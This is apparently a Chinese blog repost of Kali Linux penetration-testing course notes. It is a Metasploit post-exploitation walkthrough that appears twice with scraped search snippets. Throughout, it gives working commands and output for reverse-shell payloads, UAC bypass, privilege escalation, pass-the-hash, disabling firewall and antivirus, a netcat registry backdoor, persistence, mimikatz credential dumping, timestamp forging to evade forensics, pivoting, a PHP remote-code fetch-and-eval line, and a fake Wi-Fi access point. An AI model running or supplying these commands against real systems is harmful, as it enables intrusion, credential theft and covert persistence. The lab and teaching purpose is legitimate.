    meterpreter > timestomp -z "03/11/2019 22:22:22" 1.txt
    [*] Setting specific MACE attributes on 1.txt
    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2019-03-11 22:22:22 +0800
    Accessed      : 2019-03-11 22:22:22 +0800
    Created       : 2019-03-11 22:22:22 +0800
    Entry Modified: 2019-03-11 22:22:22 +0800
    

     

    13. pivoting 跳板 / 枢纽/支点

    • msfvenom 制作 payload
      msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b “\x00\xff” -e x86/shikata_ga_nai -f exe -o payload.exe
    • 获取 system 权限

    • KALI:1.1.1.10

    • MONO1:  EM1: 1.1.1.1   EM2: 192.168.155.8

    • MONO2:  EM1: 2.1.1.1   EM2: 192.168.155.9

    • WIN7: 2.1.1.10

    • XP:  2.1.1.11

     

    • 利用已经控制的一台计算机作为入侵内网的跳板

    • 在其他内网计算机看来访问全部来自于跳板
    • run autoroute -s 2.1.1.0/24 # 不能访问外网的被攻击目标内网网段

    • meterpreter > run autoroute -s 2.1.1.0/24
      [*] Adding a route to 2.1.1.0/255.255.255.0...
      [+] Added route to 2.1.1.0/255.255.255.0 via 192.168.155.9
      [*] Use the -p option to list all active routes
      meterpreter > run autoroute -p
      
      Active Routing Table
      ====================
      
         Subnet             Netmask            Gateway
         ------             -------            -------
         2.1.1.0            255.255.255.0      Session 1
      

       

    • 自动路由现实场景

      • 利用 win7 攻击内网 XP(对比 xp 有无外网访问权的情况)
        – 扫描内网:use auxiliary/scanner/portscan/tcp
      • msf exploit(handler) > use auxiliary/scanner/portscan/tcp 
        
        msf auxiliary(tcp) > set rhosts 2.1.1.9-2.1.1.12
        rhosts => 2.1.1.9-2.1.1.12
        msf auxiliary(tcp) > set ports 139,445
        ports => 139,445
        
        msf auxiliary(tcp) > options 
        
        Module options (auxiliary/scanner/portscan/tcp):
        
           Name         Current Setting   Required  Description
           ----         ---------------   --------  -----------
           CONCURRENCY  10                yes       The number of concurrent ports to check per host
           PORTS        139,445           yes       Ports to scan (e.g. 22-25,80,110-900)
           RHOSTS       2.1.1.9-2.1.1.12  yes       The target address range or CIDR identifier
           THREADS      1                 yes       The number of concurrent threads
           TIMEOUT      1000              yes       The socket connect timeout in milliseconds
        
        msf auxiliary(tcp) > run 
        
        [*] Scanned 1 of 4 hosts (25% complete)
        [*] 2.1.1.10:139 - TCP OPEN
        [*] 2.1.1.10:445 - TCP OPEN
        [*] Scanned 2 of 4 hosts (50% complete)
        [*] 2.1.1.11:139 - TCP OPEN
        [*] 2.1.1.11:445 - TCP OPEN
        [*] Scanned 3 of 4 hosts (75% complete)
        [*] Scanned 4 of 4 hosts (100% complete)
        [*] Auxiliary module execution completed
        

         

    • Pivoting 之端口转发 portfwd

      • 利用已经被控计算机,在kali 与攻击目标之间实现端口转发
      • portfwd add -L LIP -l LPORT -r RIP -p RPORT
      • portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
      • portfwd list / delete / flush
    • 获取XP的shell

    • use exploit/windows/smb/ms08_067_netapi   (需要在win7添加防火墙规则,绕过UAC,允许win7和XP建立网络通讯)

      • 没有添加防火墙规则的话,如下图所示

      • msf auxiliary(tcp) > use exploit/windows/smb/ms08_067_netapi   
        msf exploit(ms08_067_netapi) > options 
        
        msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(ms08_067_netapi) > options 
        
        Module options (exploit/windows/smb/ms08_067_netapi):
        
           Name     Current Setting  Required  Description
           ----     ---------------  --------  -----------
           RHOST                     yes       The target address
           RPORT    445              yes       Set the SMB service port
           SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
        
        
        Payload options (windows/meterpreter/reverse_tcp):
        
           Name      Current Setting  Required  Description
           ----      ---------------  --------  -----------
           EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
           LHOST                      yes       The listen address
           LPORT     4444             yes       The listen port
        
        
        Exploit target:
        
           Id  Name
           --  ----
           0   Automatic Targeting
        
        
        msf exploit(ms08_067_netapi) > set lhost 2.1.1.10
        lhost => 2.1.1.10
        msf exploit(ms08_067_netapi) > set rhost 2.1.1.11
        rhost => 2.1.1.11
        msf exploit(ms08_067_netapi) > exploit 
        
        [*] Started reverse handler on 2.1.1.10:4444 via the meterpreter on session 1
        [*] Automatically detecting the target...
        [*] Sending stage (957487 bytes)
        [*] Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional
        [*] Selected Target: Windows XP SP3 Chinese - Traditional (NX)
        [*] Attempting to trigger the vulnerability...
        [*] Meterpreter session 2 opened (1.1.1.10-192.168.155.5:4444 -> 2.1.1.11:1040) at 2018-09-05 13:50:55 +0800
        
        meterpreter > 
        

         

    • use exploit/multi/handler
      • set exitonsession false   #建立session后继续监听4444端口

    14. POST 模块

    • meterpreter >

    #主机发现

    • run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24 
    meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.56.0/24
    
    [*] Running module against VV-59439F0BD59B
    [*] ARP Scanning 192.168.56.0/24
    [*] 	IP: 192.168.56.1 MAC 0a:00:27:00:00:12 (UNKNOWN)
    [*] 	IP: 192.168.56.101 MAC 08:00:27:71:23:c2 (CADMUS COMPUTER SYSTEMS)
    [*] 	IP: 192.168.56.102 MAC 08:00:27:05:ea:53 (CADMUS COMPUTER SYSTEMS)
    [*] 	IP: 192.168.56.103 MAC 08:00:27:1d:39:73 (CADMUS COMPUTER SYSTEMS)
    [*] 	IP: 192.168.56.100 MAC 08:00:27:85:be:3e (CADMUS COMPUTER SYSTEMS)
    

     

    #检查是否是虚拟机    

    • run post/windows/gather/checkvm   
    meterpreter > run post/windows/gather/checkvm
    
    [*] Checking if VV-59439F0BD59B is a Virtual Machine .....
    [*] This is a Sun VirtualBox Virtual Machine
    

     

    #查看账号密码hash和token信息

    • run post/windows/gather/credentials/credential_collector 
    meterpreter > run post/windows/gather/credentials/credential_collector
    
    [*] Running module against VV-59439F0BD59B
    [+] Collecting hashes...
        Extracted: Administrator:b7eab2f3aad8ad3daad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8
        Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        Extracted: HelpAssistant:28b6a6df4f20e81455e41330c1a79c70:0f7d49c7900cdf2bc7b2b12b65678e34
        Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:0d9b1a742628418754aaf0ffd8d88816
        Extracted: vv:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    [+] Collecting tokens...
        NT AUTHORITY\LOCAL SERVICE
        NT AUTHORITY\NETWORK SERVICE
        NT AUTHORITY\SYSTEM
        VV-59439F0BD59B\vv
        NT AUTHORITY\ANONYMOUS LOGON
    

     

    #检查目标主机安装的应用程序

    • run post/windows/gather/enum_applications 
    meterpreter > run post/windows/gather/enum_applications
    
    [*] Enumerating applications installed on VV-59439F0BD59B
    
    Installed Applications
    ======================
    
     Name                                         Version
     ----                                         -------
     Oracle VM VirtualBox Guest Additions 5.2.12  5.2.12.0
     WebFldrs XP                                  9.50.7523
    
    

     

    #常看当前登录用户和最近登陆用户

    • run post/windows/gather/enum_logged_on_users
    meterpreter > run post/windows/gather/enum_logged_on_users
    
    [*] Running against session 1
    
    Current Logged Users
    ====================
    
     SID                                          User
     ---                                          ----
     S-1-5-21-606747145-920026266-854245398-1003  VV-59439F0BD59B\vv
    
    
    [*] Results saved in: /root/.msf5/loot/20180905175410_default_192.168.56.101_host.users.activ_302529.txt
    
    Recently Logged Users
    =====================
    
     SID                                          Profile Path
     ---                                          ------------
     S-1-5-18                                     %systemroot%\system32\config\systemprofile
     S-1-5-19                                     %SystemDrive%\Documents and Settings\LocalService
     S-1-5-20                                     %SystemDrive%\Documents and Settings\NetworkService
     S-1-5-21-606747145-920026266-854245398-1003  %SystemDrive%\Documents and Settings\vv
    

     

    #枚举snmp

    • run post/windows/gather/enum_snmp 

    #删除指定账号

    • run post/windows/manage/delete_user USERNAME=yuanfh

    #检查本机可利用的提权漏洞模块

    • run post/multi/recon/local_exploit_suggester  
    meterpreter > run post/multi/recon/local_exploit_suggester  
    
    [*] 192.168.56.101 - Collecting local exploits for x86/windows...
    [*] 192.168.56.101 - 31 exploit checks are being tried...
    [+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
    [+] 192.168.56.101 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
    [+] 192.168.56.101 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
    [+] 192.168.56.101 - exploit/windows/local/ms_ndproxy: The target appears to be vulnerable.
    [+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
    

     

    #查看目标环境信息

    • run post/multi/gather/env 
    meterpreter > run post/multi/gather/env
    
    APPDATA=C:\Documents and Settings\vv\Application Data
    CLIENTNAME=Console
    ComSpec=C:\WINDOWS\system32\cmd.exe
    FP_NO_HOST_CHECK=NO
    HOMEDRIVE=C:
    HOMEPATH=\Documents and Settings\vv
    LOGONSERVER=\\VV-59439F0BD59B
    NUMBER_OF_PROCESSORS=1
    OS=Windows_NT
    PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
    PROCESSOR_ARCHITECTURE=x86
    PROCESSOR_IDENTIFIER=x86 Family 6 Model 60 Stepping 3, GenuineIntel
    PROCESSOR_LEVEL=6
    PROCESSOR_REVISION=3c03
    Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
    SESSIONNAME=Console
    TEMP=C:\DOCUME~1\vv\LOCALS~1\Temp
    TMP=C:\DOCUME~1\vv\LOCALS~1\Temp
    windir=C:\WINDOWS
    

     #查看Firefox中存储的账号密码

    • run post/multi/gather/firefox_creds 

    #查看ssh账号密码的密文信息,证书信息

    • run post/multi/gather/ssh_creds  

    #检查目标主机上的指定程序是否是恶意原件

    • run post/multi/gather/check_malware REMOTEFILE=c:\a.exe  
    • run hostsedit -e 1.1.1.1,www.baidu.com
    • migrate -N explorer.exe
    • run [tab] [tab]
    • run winenum

    • 自动执行 metepreter 脚本(建立meterpreter后自动执行,InitialAutoRunScript 先于 AutoRunScript hostsedit 执行)

      • set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
      • set InitialAutoRunScript checkvm
    • 自动执行 post 模块

      • set InitialAutoRunScript migrate -n explorer.exe
      • set AutoRunScript post/windows/gather/dumplinks   #dump最近文档

    15 .持久后门

    • 利用漏洞取得的 metepreter 运行内存中,重启失效
    • 重复 exploit 漏洞可能造成服务崩溃
    • 持久后门保证漏洞修复后仍可远程控制

    • metepreter 后门

      • run metsvc -A # 删除 -r
      • use exploit/multi/handler
      • set PAYLOAD windows/metsvc_bind_tcp
      • set LPORT 31337
      • set RHOST 1.1.1.1
    • 持久后门

      • run persistence -h
      • run persistence -X -i 10 -p 4444 -r 10.0.0.128
      • run persistence -U -i 20 -p 4444 -r 10.0.0.128
      • run persistence -S -i 20 -p 4444 -r 10.0.0.128

    16. msf 延伸用法之 mimikatz

    • hashdump 使用的就是 mimikatz 的部分功能
      • getsystem
      • load mimikatz
      • wdigest ��kerberos ��msv ��ssp ��tspkg ��livessp
      • mimikatz_command -h
      • mimikatz_command -f a::
      • mimikatz_command -f samdump::hashes
      • mimikatz_command -f handle::list
      • mimikatz_command -f service::list
      • mimikatz_command -f crypto::listProviders
      • mimikatz_command -f winmine::infos # 扫雷游戏

    17. 代码执行漏洞

    • PHP shell

      • msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
      • msf 启动侦听
      • 上传到web站点并通过浏览器访问
    • web Delivery

      • 利用代码执行漏洞访问攻击者服务器
      • use exploit/multi/script/web_delivery
      • set target 1
      • run
      • php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://1.1.1.1/fTYWqmu‘));”

    18. RFI 远程文件包含

    • vi /etc/php5/cgi/php.ini
      • allow_url_fopen = On
      • allow_url_include = On
    • use exploit/unix/webapp/php_include
    • set RHOST 1.1.1.2
    • set PATH /dvwa/vulnerabilities/fi/
    • set PHPURI /?page=XXpathXX
    • set HEADERS “Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7”
    • set payload php/meterpreter/reverse_tcp
    • set lhost 1.1.1.1
    • exploit

    19. Karmetasploit

    • 伪造 AP、嗅探密码、接货数据、浏览器攻击
    • 多漏洞资源文件:wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

    • 安装其他依赖包

      • gem install activerecord sqlite3-ruby
    • 基础架构安装配置

      • apt-get install isc-dhcp-server
      • cat /etc/dhcp/dhcpd.conf
        option domain-name-servers 10.0.0.1; default-lease-time 60;
        max-lease-time 72;
        ddns-update-style none;
        authoritative;
        log-facility local7;
        subnet 10.0.0.0 netmask 255.255.255.0 {
        range 10.0.0.100 10.0.0.254;
        option routers 10.0.0.1;
        option domain-name-servers 10.0.0.1;
        }
    • 伪造 AP

      • airmon-ng start wlan0
      • airbase-ng -P -C 30 -e “FREE” -v wlan0mon
      • ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
      • touch /var/lib/dhcp/dhcpd.leases
      • dhcpd -cf /etc/dhcp/dhcpd.conf at0
    • 启动 Karmetasploit

      • msfconsole -q -r karma.rc_.txt
    • 允许用户正常上网

    • 启动 Karmetasploit

      • msfconsole -q -r karma.rc_.txt
    • 增加路由和防火墙规则

      • echo 1 > /proc/sys/net/ipv4/ip_forward
      • iptables -P FORWARD ACCEPT
      • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    posted on 2018-09-05 19:06 E11iot 阅读(...) 评论(...) 编辑 收藏

    转载于:https://www.cnblogs.com/E11iot/p/9594396.html

    展开全文
  • 本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 准备工作 已经获得目标系统控制权扩大战果提权 信息...

    本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

    Kali Linux渗透测试(苑房弘)博客记录

    1. 准备工作

    • 已经获得目标系统控制权后扩大战果

      • 提权
      • 信息收集
      • 渗透内网
      • 永久后门
    • 基于已有 session 扩大战果

      • msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o payload.exe
    • kali 监听

      msf > use exploit/multi/handler
      msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
      msf exploit(multi/handler) > set LHOST 10.0.0.128
      msf exploit(multi/handler) > exploit -j
      
    • windows 系统执行 payload.exe

    • kali 进入 metepreter

      msf exploit(multi/handler) > sessions 
      
      Active sessions
      ===============
      
        Id  Name  Type                     Information             Connection
        --  ----  ----                     -----------             ----------
        1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
      
      msf exploit(multi/handler) > sessions 
      
      Active sessions
      ===============
      
        Id  Name  Type                     Information             Connection
        --  ----  ----                     -----------             ----------
        1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
      
      msf exploit(multi/handler) > sessions -i 1
      [*] Starting interaction with 1...
      
      meterpreter > getuid
      Server username: WIN7-VM\John
      

    2. 获取 system 账号权限

    • 提权失败,一般是由于 UAC 限制

      meterpreter > getuid
      Server username: WIN7-VM\John
      meterpreter > load priv
      [-] The 'priv' extension has already been loaded.
      meterpreter > getsystem 
      [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
      [-] Named Pipe Impersonation (In Memory/Admin)
      [-] Named Pipe Impersonation (Dropper/Admin)
      [-] Token Duplication (In Memory/Admin)
      
      
      meterpreter > background
      
    • 绕过 UAC 限制

      • use exploit/windows/local/ask

        use exploit/windows/local/ask
        set payload windows/meterpreter/reverse_tcp
        use exploit/windows/local/ask
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        set FILENAME win_update.exe
        set SESSION 1
        exploit
        

        meterpreter > getsystem
        meterpreter > getuid
        

      • use exploit/windows/local/bypassuac

        use exploit/windows/local/bypassuac
        set SESSION 1
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        show targets
        exploit
        

      • use exploit/windows/local/bypassuac_injection

        use exploit/windows/local/bypassuac_injection
        set SESSION 1
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        

    • 利用漏洞直接提权为 system

      • use exploit/windows/local/ms13_053_schlamperei

        use exploit/windows/local/ms13_053_schlamperei
        set SESSION 1
        

      • use exploit/windows/local/ms13_081_track_popup_menu

        use exploit/windows/local/ms13_081_track_popup_menu
        set SESSION 1
        exploit
        

      • use exploit/windows/local/ms13_097_ie_registry_symlink

        use exploit/windows/local/ms13_097_ie_registry_symlink
        set SESSION 1
        set URIPATH /
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        set SRVHOST 10.0.0.128
        exploit
        
      • use exploit/windows/local/ppr_flatten_rec

        use exploit/windows/local/ppr_flatten_rec
        set SESSION 1
        exploit
        

    • 图形化 payload

      • set payload windows/vncinject/reverse_tcp

        use exploit/windows/local/ppr_flatten_rec
        set payload windows/vncinject/reverse_tcp
        set SESSION 1
        set LHOST 10.0.0.128
        set ViewOnly false
        exploit
        

    • 关闭 UAC 功能

      • 获取 hashdump

        meterpreter > hashdump
            Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
        
      • 尝试利用

        use exploit/windows/smb/psexec
        set RHOST 10.0.0.132
        set SMBUser John
        set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        

        报错:Exploit failed [no-access]

      • 需要提前关闭 UAC

        sessions -i 2
        shell
        cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
        shutdown -r -t 0
        

      • 再次利用

        use exploit/windows/smb/psexec
        set RHOST 10.0.0.132
        set SMBUser John
        set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        

    4. 基础操作

    1. 关闭防火墙

    • 需要管理员或system权限

      netsh advfirewall set allprofiles state on
      netsh advfirewall set allprofiles state off
      

    2. 关闭 windefend

    • 查看服务名称

    • 关闭防火墙

      net stop windefend
      

    3. bitlocker 加密

    • manage-bde -off C:
    • manage-bde -status C:

    4. 关闭 DEP

    • bcdedit.exe /set {current} nx AlwaysOff

    5 杀死防病毒软件

    • run killav
    • run post/windows/manage/killav

    6. 开启远程桌面服务

    # 开启服务
    run post/windows/manage/enable_rdp
    

    # 关闭服务
    run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt
    
    # 开启服务
    run getgui –e
    run getgui -u yuanfh -p pass
    run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc
    

    7. 查看远程桌面

    • screenshot
    • use espia
      • screengrab

    5. 使用 tokens 攻击域控制器

    -tokens
    - 用户每次登录,账号绑定临时的tokens
    - 访问资源时提交 tokens 进行身份验证,类似于 web cookies
    - delegate tokens:交互登录会话
    - impersonate tokens:非交互登录会话
    - delegate tokens 账号注销后变为 Impersonate Token,权限依然有效

    • Incognito

      • 独立功能的软件,被 msf 集成在 metepreter 中
      • 无需密码或破解或获取密码 hash,窃取 tokens 将自己伪装成其他用户
      • 尤其适用于域环境下提权渗透多操作系统
    • 搭建域环境

      • DC + XP
    • load incognito

      • list_tokens -u
      • impersonate_token lab\administrator
      • 运行以上命令需要 getsystem
        • 本地普通权限用户需要先本地权限
        • use exploit/windows/local/ms10_015_kitrap0d
        • execute -f cmd.exe -i -t # -t:使用当前假冒tokens执行程序
        • shell

    8. 注册表

    • 注册表保存着 windows 几乎全部配置参数

      • 如果修改不当,可直接造成系统崩溃
      • 修改前完整备份注册表
      • 某些注册表的修改是不可逆的
    • 常见用途

      • 修改、增加启动项
      • 窃取存储于注册表中的机密信息
      • 绕过文件型病毒查杀
    • 用注册表添加 nc 后门服务(metepreter)

      • meterpreter >
      • upload /usr/share/windows-binaries/nc.exe C:\windows\system32
      • reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
      • reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’
      • reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
    • 打开防火墙端口(metepreter)

      • meterpreter >
      • execute -f cmd -i -H
      • netsh firewall show opmode
      • netsh firewall add portopening TCP 4444 “test” ENABLE ALL
      • shutdown -r -f -t 0
      • nc 10.0.0.132 444
    • 其他注册表项

    9. 抓包

    • 抓包(metepreter)
      • load sniffer
      • sniffer_interfaces
      • sniffer_start 2
      • sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
      • 在内存中缓冲区块循环存储抓包(50000包),不写硬盘
      • 智能过滤 metepreter 流量,传输全称使用 SSL/TLS 加密
    • 解码
      • use auxiliary/sniffer/psnuffle
      • set PCAPFILE /root/1.cap

    10. 搜索文件

    • search -f *.ini
    • search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

    11. 破解弱口令

    • John the Ripper 破解弱口令

    – use post/windows/gather/hashdump # system 权限的 metepreter
    - run # 结果保存在 /tmp 目录下
    - use auxiliary/analyze/jtr_crack_fast
    - run

    12. 擦除痕迹

    • 文件系统访问会留下痕迹。电子取证重点关注
    • 渗透测试和攻击者往往希望销毁文件系统访问痕迹
    • 最好的避免被电子取证发现的方法:不要碰文件系统

      • metepreter 的先天优势所在(完全基于内存)
    • MAC 时间 (Modified / Accessed / Changed)

      • ls -l –time=atime/mtime/ctime 1.txt
      • stat 1.txt
      • touch -d “2 days ago” 1.txt
      • touch -t 1501010101 1.txt
    • MACE:MFT entry

      • MFT:NTFS 文件系统的主文件分配表 Master File Table
      • 通常 1024 字节或2个硬盘扇区,其中存放多项 entry 信息
      • 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
      • 更多信息可研究文件系统取证分析技术
    • Timestomp (meterpreter)

      • timestomp -v 1.txt
      • timestomp -f c:\autoexec.bat 1.txt
        -b -r # 擦除 MACE 时间信息,目前此参数功能失效
      • -m / -a / -c / -e / -z
      • timestomp -z “MM/DD/YYYY HH24:MI:SS” 2.txt

    13. pivoting 跳板 / 枢纽/支点

    • msfvenom 制作 payload
      msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b “\x00\xff” -e x86/shikata_ga_nai -f exe -o payload.exe
    • 获取 system 权限

    • 利用已经控制的一台计算机作为入侵内网的跳板

    • 在其他内网计算机看来访问全部来自于跳板
    • run autoroute -s 1.1.1.0/24 # 不能访问外网的被攻击目标内网网段

    • 自动路由现实场景

      • 利用 win7 攻击内网 XP(对比 xp 有无外网访问权的情况)
        – 扫描内网:use auxiliary/scanner/portscan/tcp
    • Pivoting 之端口转发 portfwd

      • 利用已经被控计算机,在kali 与攻击目标之间实现端口转发
      • portfwd add -L LIP -l LPORT -r RIP -p RPORT
      • portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
      • portfwd list / delete / flush
    • use exploit/windows/smb/ms08_067_netapi

      • set RHOST 127.0.0.1
      • set LHOST 2.1.1.10
    • use exploit/multi/handler
      • set exitonsession false

    14. POST 模块

    • meterpreter >
    • run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
    • run post/windows/gather/checkvm
    • run post/windows/gather/credentials/credential_collector
    • run post/windows/gather/enum_applications
    • run post/windows/gather/enum_logged_on_users
    • run post/windows/gather/enum_snmp
    • run post/windows/manage/delete_user USERNAME=yuanfh
    • run post/multi/recon/local_exploit_suggester
    • run post/multi/gather/env
    • run post/multi/gather/firefox_creds
    • run post/multi/gather/ssh_creds
    • run post/multi/gather/check_malware REMOTEFILE=c:\a.exe
    • run hostsedit -e 1.1.1.1,www.baidu.com
    • migrate -N explorer.exe
    • run [tab] [tab]
    • run winenum

    • 自动执行 metepreter 脚本

      • set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
      • set InitialAutoRunScript checkvm
    • 自动执行 post 模块

      • set InitialAutoRunScript migrate -n explorer.exe
      • set AutoRunScript post/windows/gather/dumplinks

    15 .持久后门

    • 利用漏洞取得的 metepreter 运行内存中,重启失效
    • 重复 exploit 漏洞可能造成服务崩溃
    • 持久后门保证漏洞修复后仍可远程控制

    • metepreter 后门

      • run metsvc -A # 删除 -r
      • use exploit/multi/handler
      • set PAYLOAD windows/metsvc_bind_tcp
      • set LPORT 31337
      • set RHOST 1.1.1.1
    • 持久后门

      • run persistence -h
      • run persistence -X -i 10 -p 4444 -r 10.0.0.128
      • run persistence -U -i 20 -p 4444 -r 10.0.0.128
      • run persistence -S -i 20 -p 4444 -r 10.0.0.128

    16. msf 延伸用法之 mimikatz

    • hashdump 使用的就是 mimikatz 的部分功能
      • getsystem
      • load mimikatz
      • wdigest ��kerberos ��msv ��ssp ��tspkg ��livessp
      • mimikatz_command -h
      • mimikatz_command -f a::
      • mimikatz_command -f samdump::hashes
      • mimikatz_command -f handle::list
      • mimikatz_command -f service::list
      • mimikatz_command -f crypto::listProviders
      • mimikatz_command -f winmine::infos # 扫雷游戏

    17. 代码执行漏洞

    • PHP shell

      • msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
      • msf 启动侦听
      • 上传到web站点并通过浏览器访问
    • web Delivery

      • 利用代码执行漏洞访问攻击者服务器
      • use exploit/multi/script/web_delivery
      • set target 1
      • run
      • php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://1.1.1.1/fTYWqmu‘));”

    18. RFI 远程文件包含

    • vi /etc/php5/cgi/php.ini
      • allow_url_fopen = On
      • allow_url_include = On
    • use exploit/unix/webapp/php_include
    • set RHOST 1.1.1.2
    • set PATH /dvwa/vulnerabilities/fi/
    • set PHPURI /?page=XXpathXX
    • set HEADERS “Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7”
    • set payload php/meterpreter/reverse_tcp
    • set lhost 1.1.1.1
    • exploit

    18. Karmetasploit

    • 伪造 AP、嗅探密码、接货数据、浏览器攻击
    • 多漏洞资源文件:wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

    • 安装其他依赖包

      • gem install activerecord sqlite3-ruby
    • 基础架构安装配置

      • apt-get install isc-dhcp-server
      • cat /etc/dhcp/dhcpd.conf
        option domain-name-servers 10.0.0.1; default-lease-time 60;
        max-lease-time 72;
        ddns-update-style none;
        authoritative;
        log-facility local7;
        subnet 10.0.0.0 netmask 255.255.255.0 {
        range 10.0.0.100 10.0.0.254;
        option routers 10.0.0.1;
        option domain-name-servers 10.0.0.1;
        }
    • 伪造 AP

      • airmon-ng start wlan0
      • airbase-ng -P -C 30 -e “FREE” -v wlan0mon
      • ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
      • touch /var/lib/dhcp/dhcpd.leases
      • dhcpd -cf /etc/dhcp/dhcpd.conf at0
    • 启动 Karmetasploit

      • msfconsole -q -r karma.rc_.txt
    • 允许用户正常上网

    • 启动 Karmetasploit

      • msfconsole -q -r karma.rc_.txt
    • 增加路由和防火墙规则

      • echo 1 > /proc/sys/net/ipv4/ip_forward
      • iptables -P FORWARD ACCEPT
      • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    展开全文
  • 点击蓝字关注我们经历漫长的等待后,后渗透测试神器 Empire 终于迎来了多项重大功能升级的 3.0 版本(https://github.com/BC-SECURITY/Empire/)。Empire 是一款类似 Metasploit 的 PowerShell 可视化后期渗透测试框架...
  • 作者:xax007@知道创宇404 ScanV安全服务团队作者博客:https://xax007.github.io/ 原文链接:红队后渗透测试中的文件传输技巧在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS...
  • 后渗透测试,直接用实例演示过程如下: 基于已经获取meterpreter,getsystem,同时上传文件扫描内网网段中其他主机。同时在该受控主机下留下持久后门。 在system的权限下上传nmap.exe,至于获取system的...
  • Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。...推荐文章++++ *MacOS下的渗透测试工具 *VulnerabilityList 渗透测试漏洞扫描检测工具 *渗透测试实用工具
  • 在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限...本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用MSF进行后渗透测试。 ...
  • mesploit后渗透测试阶段常用命令

